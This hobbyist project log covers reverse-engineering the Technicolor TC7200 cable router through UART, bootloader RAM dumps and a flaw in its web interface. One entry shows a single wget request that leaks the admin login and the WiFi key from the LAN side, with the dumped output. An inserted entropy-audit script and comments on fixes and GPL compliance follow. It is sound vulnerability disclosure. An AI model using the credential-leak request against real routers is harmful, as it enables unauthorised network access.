
technicolor tc7200 cable "modem"

The lowest-end cable modem available for UPC, KabelDeutschland and other cable internet providers is the Technicolor TC7200. It is marketed as a "modem", but in fact it is a router.
The firmware is branded/limited, buggy and "ugly" (e.g. the complete web interface is live-translated via JavaScript, and options like bridge mode and wifi do not work). As the device runs Linux and provides different interfaces (including cable), it would be nice to get into the system and play with it. I will use a unit off eBay, as the units provided by the cable company are still owned by them (and I don't want to jam the interwebs).

[!!!] FOR CHANGES/MODS/HACKS ON THE DEVICE I USE A UNIT OFF EBAY WHICH I (not a KabelBW customer!) NEVER CONNECT TO THE CABLE NETWORK FOR THESE EXPERIMENTS [!!!]

The Technicolor TC7200 runs Linux. Neither Technicolor nor the cable provider (KabelBW) provides the sources for the GPL-licensed code. Technicolor does not answer end-customer questions, and KabelBW does not answer questions without a customer number (which I will not provide because it is not relevant for the request).

On top of that, the device is unstable and insecure (e.g. get the admin password or do a factory reset from the LAN side with a single HTTP request) - yay! It is not possible to configure wireless (the config page just shows an error message), but wireless is still enabled.

To secure devices and network I had to add a second OpenWrt box and DMZ it (at least this works...).

  • uart commandline

    rawe, 01/21/2015 at 22:20, 0 comments

    Finally I've got a unit the cable provider does not want back, so it is time to open it up and check for the two UART interfaces. One UART interface provides bootloader access, the other one Linux /dev/ttyS0. There is one SPI flash of 1 megabyte, one parallel NAND flash chip and one DDR RAM chip.

    <insert pic here>

    The Linux login does not work (admin/admin), as the session terminates immediately after login.

    It is not possible to dump the flash content via the bootloader, as the memory dump function only handles addresses 0x80000000 and up. Fortunately the boot images seem to get loaded into this address space during bootup, which may make the system cold-boot-attackable: e.g. power up the device, reset it and then dump the RAM contents. As it takes ages to dump megabytes of data over UART, here is just the output of the strings command on the first few dumped kilobytes after 0x80000000, to prove that it is at least possible to get some useful data out of this:

    !@        
     @T@
    b4BM
    Bldr
    2.4.0alpha18p1
    Bldr
    LVGbootloader
    image1
    image2
    linux
    linuxapps
    permnv
    dhtml
    dynnv
    linuxkfs
    ...
    

    (these strings are used by the bootloader for the flash partition overview table printed on startup).

    Next steps are to check the available address space (too high addresses crash the unit). If it is possible to address 128 megabytes after 0x80000000, the real physical memory is mapped to these addresses.

    From the Linux boot log:

    [ 21.310000] Serial: BCM63XX driver $Revision: 1.4 $

  • dump admin and wifi password from LAN

    rawe, 11/25/2014 at 20:11, 0 comments

    just do a

    wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | strings

    and receive

    8021
    !UPC1386571
        *    +
        SKKMRPXP
        27354285
        Broadcom
        Broadcom
    TechnicolorAP
    123456
    #0x000102030405060708090A0B0C0D0EBB
    0000001
    CDP.
    RG..
    admin
    Technicolor
    clock.via.net
    ntp.nasa.gov
    tick.ucla.edu
    FIRE
    T802
    UPC1386571
    2.4G
    UPC0118016
        SKKMRPXP
        EZXRXZZE
    THOMSON
    THOMSON
        SKKMRPXP
    THOMSON
    THOMSON
    THOMSON
    UPC.
    <Admin
    MLog
    admin
    admin
    

    The last two lines are the admin login (user admin, password admin). I leave them set to their default config, because it does not increase security to change them...

    The wireless name is UPC1386571 and the password SKKMRPXP:

    Cell 08 - Address: 8C:04:FF:*:*:*
        Channel:11
        Frequency:2.462 GHz (Channel 11)
        Quality=54/70  Signal level=-56 dBm  
        Encryption key:on
        ESSID:"UPC1386571"
        Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
          24 Mb/s; 36 Mb/s; 54 Mb/s
        Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
        Mode:Master
        Extra:tsf=00000008198c21d5
        Extra: Last beacon: 220ms ago
        IE: IEEE 802.11i/WPA2 Version 1
            Group Cipher : TKIP
            Pairwise Ciphers (2) : CCMP TKIP
            Authentication Suites (1) : PSK
        IE: WPA Version 1
            Group Cipher : TKIP
            Pairwise Ciphers (2) : CCMP TKIP
            Authentication Suites (1) : PSK

    There is no way to disable wireless (or edit the password) because I am greeted with the error message

    The connection to the server was reset while the page was loading.

    if I try to access the "Wireless" settings tab in the web UI. It is not possible to edit the dumped config file and write it back, because this is broken in current software.

    De facto, anyone who figures out the algorithm that calculates the wifi password based on... well, most probably just the MAC address or something else visible from the outside... can access my wireless network, which I never activated (btw. internet was ordered WITHOUT wifi, because they want extra money for it!). If the wifi password is truly "random", it is still only 8 characters long and uppercase letters only, of which only E S P K M R X Z were observed so far (only 8!).

    It is time to wrap that device in aluminium foil...

    Edit: told you so... http://derstandard.at/2000028921659/UPC-Standard-WLAN-Passwoerter-kinderleicht-zu-knacken

    I am sure TechnicolorAP / 123456 and the other strange strings are other login credentials, maybe used for telnet (did not try this on the internet connected/KabelBW provided unit):

    Trying 192.168.100.1...
    Connected to 192.168.100.1.
    Escape character is '^]'
    
    Broadcom Corporation Embedded BFC Telnet Server (c) 2000-2008
    
    WARNING: Access allowed by authorized users only.
    
    Login:

    other source for CSRF Vulnerabilities: https://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/
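
An added example for the config leak and key-space issue described in this log entry (not part of the original project log): it takes the `strings` output of a config backup from your own gateway, flags adjacent lines that match known default logins, and estimates the entropy of 8-letter uppercase factory keys. The sample input, the `DEFAULT_PAIRS` table, the 80-bit target and all function names are assumptions of this example.

```python
import math
import re

# Constructed sample: lines copied from the dump above, order preserved.
SAMPLE = """\
!UPC1386571
    SKKMRPXP
TechnicolorAP
123456
UPC0118016
    SKKMRPXP
    EZXRXZZE
MLog
admin
admin
"""

# Pairs the log entry names as (likely) logins; an assumption of this example.
DEFAULT_PAIRS = {("admin", "admin"), ("TechnicolorAP", "123456")}
PSK_SHAPE = re.compile(r"[A-Z]{8}")  # factory key shape seen on this device

def entropy_bits(length, alphabet_size):
    """Entropy in bits of a uniformly random string."""
    return length * math.log2(alphabet_size)

def min_length_for(bits, alphabet_size):
    """Shortest uniformly random string reaching `bits` of entropy."""
    return math.ceil(bits / math.log2(alphabet_size))

def audit(strings_output):
    lines = [s.strip() for s in strings_output.splitlines() if s.strip()]
    # Adjacent user/password lines matching a known default pair.
    defaults = sorted({p for p in zip(lines, lines[1:]) if p in DEFAULT_PAIRS})
    # Distinct strings shaped like the factory-generated WPA key.
    psks = sorted({s for s in lines if PSK_SHAPE.fullmatch(s)})
    alphabet = "".join(sorted(set("".join(psks))))
    return {
        "default_pairs": defaults,
        "psk_candidates": psks,
        "observed_alphabet": alphabet,
        "bits_if_observed_alphabet": entropy_bits(8, len(alphabet)) if alphabet else 0.0,
        "bits_if_full_uppercase": entropy_bits(8, 26),
        # Length of a random [A-Za-z0-9] replacement key for 80 bits.
        "replacement_len_80_bits": min_length_for(80, 62),
    }

if __name__ == "__main__":
    for key, value in audit(SAMPLE).items():
        print(f"{key}: {value}")
```

With only the eight letters observed in the dump, an 8-character key carries 24 bits; with the full uppercase alphabet it is still only about 37.6 bits.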


Discussions

esot.eric wrote 01/13/2015 at 13:09 point

Is it part of the 1337 haxor's mentality to make a description that's only relevant to those "in the know" or...? Seriously.


rawe wrote 01/21/2015 at 21:01 point

description was replaced with one that should be clearer, just ask if there are additional Qs.


esot.eric wrote 01/21/2015 at 22:11 point

Ah, cool, thanks.


basto wrote 01/10/2015 at 16:41 point

"if I try to access the "Wireless" settings tab in the web UI. It is not
possible to edit the dumped config file and write it back, because this
is broken in current software"

I ran into the same problem - there is a trick to fix it:

1. Remove the power AND the coax from the modem
2. Do a factory reset (plug in power, and push the reset button for 40 seconds)
3. Login and click wireless, disable wireless, save
4. Replug everything like it was, power cycle.

Here's the German reference:

http://www.unitymediakabelbwforum.de/viewtopic.php?f=77&t=29281&start=30#p306077

Apart from that: What you said about the sources being unavailable to end users is very interesting. If Technicolor really refused to give you the source, this is a clear GPL violation and you should point it out to the FSF.

https://www.gnu.org/licenses/gpl-violation.html

They already acted in case of AVM:

https://fsfe.org/news/2011/news-20110620-01.en.html

Edit: Oh, another thing.

Also my wireless keys contain 8 letters, but I think the full alphabet is used for the random generation.

Additionally to yours above, mine contain:

A,B,C,F,G,H,N,T,Q (taken both from 2.4 and 5 GHz SSIDs)


rawe wrote 01/13/2015 at 12:31 point

Thanks for the wifi hints :) I still need to verify that GPL code runs on the device myself... I have no time to look into the GPL thing in detail, but here is a starting point if somebody wants to:


basto wrote 01/14/2015 at 12:32 point

You don't need to verify GPL software anymore.

Look here:

http://www.boards.ie/vbulletin/showthread.php?s=70037423285b05c4bc6b39549dbc4cf9&t=2057147563

The serial console reads:

"""

(... lots of stuff...)

Booting Linux...

(...lots of stuff...)

"""

I also read that BusyBox (also GPL) is installed, but I don't find the reference anymore.


rawe wrote 01/14/2015 at 13:12 point
as seen on https://news.ycombinator.com/item?id=7584466 ;)

